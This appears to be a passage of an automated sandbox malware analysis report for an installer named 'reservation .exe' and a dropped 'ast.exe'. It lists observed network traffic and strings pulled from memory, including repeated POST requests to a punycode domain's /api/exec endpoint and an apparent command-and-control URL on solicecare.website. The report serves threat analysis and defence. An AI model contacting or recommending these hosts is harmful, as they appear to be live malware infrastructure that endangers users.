                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: global trafficHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: Joe Sandbox ViewIP Address: 212.193.169.65 212.193.169.65
                          Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: C:\Users\user\AppData\Roaming\fat\ast.exeCode function: 10_2_6B6F09F0 recv,send,WSAGetLastError,10_2_6B6F09F0
                          Source: global trafficDNS traffic detected: DNS query: id.xn--80akicokc0aablc.xn--p1ai
                          Source: unknownHTTP traffic detected: POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1Host: id.xn--80akicokc0aablc.xn--p1ai:443Content-Length: 269
                          Source: reservation .exe, 00000000.00000003.2036017646.0000000002640000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000003.2041310250.00000000034D0000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000003.2043757118.0000000000BC0000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000002.00000003.2043757118.0000000000C25000.00000004.00001000.00020000.00000000.sdmp, reservation .exe, 00000003.00000003.2459283655.0000000002245000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000004.00000003.2454431247.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, reservation .tmp, 00000004.00000003.2454431247.000000000372F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1/innosetup/index.htm
                          Source: reservation .exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          Source: reservation .exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          Source: reservation .exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          Source: xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455548445.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2457697380.000000000315E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455975979.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, aw_sas32.dll.8.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455548445.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2457697380.000000000315E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455975979.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, aw_sas32.dll.8.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                          Source: reservation .exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                          Source: reservation .exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                          Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265017891.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299122357.0000000005C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr6alphasslca2023.crl0G
                          Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3183555638.0000000005BEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                          Source: xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                          Source: reservation .exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: reservation .exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: reservation .exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                          Source: xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                          Source: reservation .tmp, 00000004.00000003.2454431247.000000000372F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://jrsoftware.github.io/issrc/ISHelp/isxfunc.xml
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455548445.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2457697380.000000000315E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455975979.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, aw_sas32.dll.8.dr, is-8MMT6.tmp.4.drString found in binary or memory: http://ocsp.comodoca.com0
                          Source: reservation .exeString found in binary or memory: http://ocsp.digicert.com0A
                          Source: reservation .exeString found in binary or memory: http://ocsp.digicert.com0C
                          Source: reservation .exeString found in binary or memory: http://ocsp.digicert.com0X
                          Source: reservation .exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                          Source: reservation .exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                          Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265017891.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299122357.0000000005C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr6alphasslca20230W
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2451867441.0000000003108000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454251899.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454713118.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2459594021.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455429869.0000000002EBF000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2456715536.000000000313E000.00000004.00000020.00020000.00000000.sdmp, is-RFQHO.tmp.4.dr, is-8MMT6.tmp.4.drString found in binary or memory: http://ocsp.sectigo.com0
                          Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3183555638.0000000005BEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr60;
                          Source: ast.exe, 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/exe
                          Source: reservation .exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                          Source: reservation .exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                          Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265017891.0000000005C86000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299122357.0000000005C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr6alphasslca2023.crt0
                          Source: ast.exe, 0000000A.00000003.2895606355.0000000005BD1000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3183555638.0000000005BEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r6.crt06
                          Source: ast.exe, 0000000A.00000002.3307409011.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2872296448.0000000002790000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000C.00000002.2955493951.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://solicecare.website/de37/update.php
                          Source: ast.exe, 0000000C.00000002.2955493951.0000000002850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://solicecare.website/de37/update.phph?
                          Source: ast.exe, 0000000B.00000002.2872296448.0000000002790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://solicecare.website/de37/update.phpr
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE0000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2871829583.0000000000D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000C.00000002.2954858422.0000000000C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Types.
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/TypesE
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesbcrypt
                          Source: ast.exe, 0000000B.00000002.2871829583.0000000000D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesn
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesu
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000CE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesw
                          Source: ast.exe, 0000000B.00000002.2871829583.0000000000D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.borland.com/namespaces/Typesy
                          Source: ast.exe, 0000000C.00000003.2953257211.0000000002DDD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
                          Source: ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.openssl.org/)
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2726150337.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2458749417.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2457697380.000000000314A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/V
                          Source: reservation .tmp, 00000004.00000003.2450314953.00000000065BE000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2873934994.0000000061EA0000.00000008.00000001.01000000.0000000D.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: ast.exe, 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: https://curl.haxx.se/V
                          Source: ast.exe, 0000000A.00000002.3326650161.000000006B744000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: https://curl.haxx.se/docs/copyright.htmlD
                          Source: ast.exe, ast.exe, 0000000A.00000002.3326451392.000000006B72B000.00000002.00000001.01000000.00000017.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                          Source: ast.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html#
                          Source: ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1524/
                          Source: ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1526/
                          Source: ast.exe, 0000000A.00000000.2730281368.0000000000942000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: https://datatracker.ietf.org/ipr/1914/
                          Source: ast.exe, 0000000A.00000003.3299966293.0000000005BF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.x
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005C1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2835183941.0000000005C31000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2895606355.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn-
                          Source: ast.exe, 0000000A.00000003.3035050247.0000000005C35000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073381090.0000000005C35000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3007753831.0000000005C36000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265864125.0000000005C70000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aa
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002F24000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3324461869.0000000006A0C000.00000004.00000001.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3337372696.000000006C946000.00000004.00000001.01000000.0000000F.sdmp, ast.exe, 0000000A.00000003.2835407797.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3073203061.0000000005C5B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005BF2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3034431813.0000000005C80000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3300702932.0000000005C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002EF2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai)
                          Source: ast.exe, 0000000A.00000003.2784241804.0000000005BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai.dll/
                          Source: ast.exe, 0000000A.00000003.3299122357.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3322683873.0000000005C68000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3300702932.0000000005C69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai.dllC;1
                          Source: ast.exe, 0000000A.00000003.2914715160.0000000005BFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai.dllI
                          Source: ast.exe, 0000000A.00000003.3267513698.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai.dllM
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai00
                          Source: ast.exe, 0000000A.00000002.3306161257.0000000000DBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai3
                          Source: ast.exe, 0000000A.00000003.3034764637.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai4j1
                          Source: ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2835407797.0000000005C02000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3265137068.0000000005C35000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2807629713.0000000005C27000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914306157.0000000005C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443
                          Source: ast.exe, 0000000A.00000003.3073381090.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443-
                          Source: ast.exe, 0000000A.00000002.3324461869.0000000006A0C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002EE3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...43
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002EE3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443...4335AW
                          Source: ast.exe, 0000000A.00000003.3299966293.0000000005C39000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C39000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/
                          Source: ast.exe, 0000000A.00000003.3007753831.0000000005C36000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3322683873.0000000005C9D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3320611390.0000000005BE5000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3300835223.0000000005BEC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914306157.0000000005C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec
                          Source: ast.exe, 0000000A.00000003.3299966293.0000000005C39000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3321452635.0000000005C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/stClnD956C
                          Source: ast.exe, 0000000A.00000003.3183555638.0000000005BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:443/stClnstCln
                          Source: ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:4432
                          Source: ast.exe, 0000000A.00000003.3073381090.0000000005C1F000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3307636336.0000000002EEB000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3299966293.0000000005C23000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2914485845.0000000005C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335
                          Source: ast.exe, 0000000A.00000002.3309198121.0000000003122000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335-
                          Source: ast.exe, 0000000A.00000002.3309198121.000000000311B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335...
                          Source: ast.exe, 0000000A.00000002.3307636336.0000000002EEB000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:44335y
                          Source: ast.exe, 0000000A.00000003.3299966293.0000000005C3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://id.xn--80akicokc0aablc.xn--p1ai:4439c0
